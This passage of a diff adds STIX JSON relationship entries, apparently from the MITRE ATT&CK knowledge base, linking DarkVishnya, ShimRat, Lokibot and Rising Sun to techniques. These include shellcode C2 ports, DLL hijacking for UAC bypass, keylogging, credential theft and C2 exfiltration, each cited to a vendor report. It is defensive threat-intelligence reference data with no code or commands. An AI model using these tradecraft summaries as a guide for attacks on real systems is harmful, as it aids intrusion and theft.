+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ca38f31f-3551-49e3-835b-588693a8b512",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.758Z",
+ "created": "2020-05-15T13:43:22.758Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) created new services for shellcode loaders distribution.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--12dcf7c0-4f6b-4eb1-9317-3337822ecbe1",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.771Z",
+ "created": "2020-05-15T13:43:22.771Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used PowerShell to create shellcode loaders.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--bff00753-95ef-4a13-96fa-963365520573",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.780Z",
+ "created": "2020-05-15T13:43:22.780Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used DameWare Mini Remote Control for lateral movement.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--96934e69-6d38-4ebd-970d-3d9bf88e03e3",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.791Z",
+ "created": "2020-05-15T13:43:22.791Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used network sniffing to obtain login data. (Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--c2ba1f7a-1951-47df-855b-3f42a60a9901",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.793Z",
+ "created": "2020-05-15T13:43:22.793Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used brute-force attack to obtain login data.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--5a9197b3-c5fb-4288-9fdf-684fa289435b",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.806Z",
+ "created": "2020-05-15T13:43:22.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) performed port scanning to obtain the list of active services.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3778dc3a-14b2-43e9-8e37-d1c3c731b390",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.809Z",
+ "created": "2020-05-15T13:43:22.809Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) sent generated reports to the C2 via HTTP POST requests.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--06317104-8397-453e-bef8-aa3269360ffc",
+ "type": "relationship",
+ "modified": "2020-05-15T13:45:25.432Z",
+ "created": "2020-05-15T13:45:25.432Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can be issued a command shell function from the C2.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--84d3fa4b-a4c6-404c-a363-0d9a96381952",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.268Z",
+ "created": "2020-05-15T15:04:34.028Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has used a secondary C2 location if the first was unavailable.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a2118212-1594-4fb1-8076-5a8649756c9c",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.383Z",
+ "created": "2020-05-15T15:04:34.051Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can sleep when instructed to do so by the C2.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7060e30c-cbb6-4b79-ad52-5e1619e030f0",
+ "type": "relationship",
+ "modified": "2020-05-15T18:32:19.789Z",
+ "created": "2020-05-15T15:04:34.041Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has used Windows API functions to install the service and shim.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--bdd7c955-c41a-4b68-9eb6-1ecd66869457",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.391Z",
+ "created": "2020-05-15T15:04:34.090Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444)'s loader has been packed with the compressed [ShimRat](https://attack.mitre.org/software/S0444) core DLL and the legitimate DLL for it to hijack.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--ac88262c-e14d-4f52-a5df-bbddc6d5c1bc",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.405Z",
+ "created": "2020-05-15T15:04:34.092Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--980a5f66-14d7-42c6-82f7-ef96cbab77bb",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.310Z",
+ "created": "2020-05-15T15:04:34.552Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--b057569e-0e0b-4e8e-9955-016a556b8248",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.343Z",
+ "created": "2020-05-15T15:04:34.555Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has the capability to upload collected files to a C2.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d6d72bc4-c8d7-48b3-96c3-84a9810333d2",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.347Z",
+ "created": "2020-05-15T15:04:34.559Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has registered two registry keys for shim databases.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--f81b567d-9fd3-44f4-bd6b-9ba6f386609e",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.346Z",
+ "created": "2020-05-15T15:04:34.561Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--58238854-4649-4cea-a43d-aae442dc60a6",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.345Z",
+ "created": "2020-05-15T15:04:34.563Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can impersonate Windows services and antivirus products to avoid detection on compromised systems.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--684b6701-559f-4ba9-a2b0-f79ed5683eb1",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.481Z",
+ "created": "2020-05-15T15:36:44.007Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the username on the infected host.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3ccef052-7ac9-47b1-9be6-8c140f279941",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.752Z",
+ "created": "2020-05-15T16:50:05.752Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the computer name and Windows product name/version.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a9e6a51e-69b1-4b21-9db1-5aabdded2f0a",
+ "type": "relationship",
+ "modified": "2020-05-18T22:00:40.779Z",
+ "created": "2020-05-15T16:50:05.775Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to copy itself to a hidden file and directory.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--af1fc367-9987-4076-9ce6-2414cd2d4a1f",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.777Z",
+ "created": "2020-05-15T16:50:05.777Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7cafb7b2-5227-4340-b531-7bd134645d30",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.780Z",
+ "created": "2020-05-15T16:50:05.780Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to capture input on the compromised host via keylogging.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6494b2d2-8f8f-4e81-886c-dadd57df6edc",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.782Z",
+ "created": "2020-05-15T16:50:05.782Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fe69bcdd-8df4-44e3-8994-b46e4d4c8aac",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.783Z",
+ "created": "2020-05-15T16:50:05.783Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1f888716-1e49-4d8d-b693-67c6eae8a775",
+ "type": "relationship",
+ "modified": "2020-05-18T13:42:53.799Z",
+ "created": "2020-05-15T16:50:05.805Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has used HTTP for C2 communications.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e129d95a-e98e-4bf8-b065-57651dc3335d",
+ "type": "relationship",
+ "modified": "2020-05-18T22:00:40.786Z",
+ "created": "2020-05-15T16:50:05.817Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can modify file attributes to hide files.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f1992fc5-5013-4fad-9a43-74a7f2b9e3ec",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.436Z",
+ "created": "2020-05-15T16:55:19.294Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "relationship_type": "uses",
+ "id": "relationship--1a5f6f44-56a3-4219-af5c-1753e17d72d6",
+ "type": "relationship",
+ "modified": "2020-05-15T17:03:13.020Z",
+ "created": "2020-05-15T16:56:55.451Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
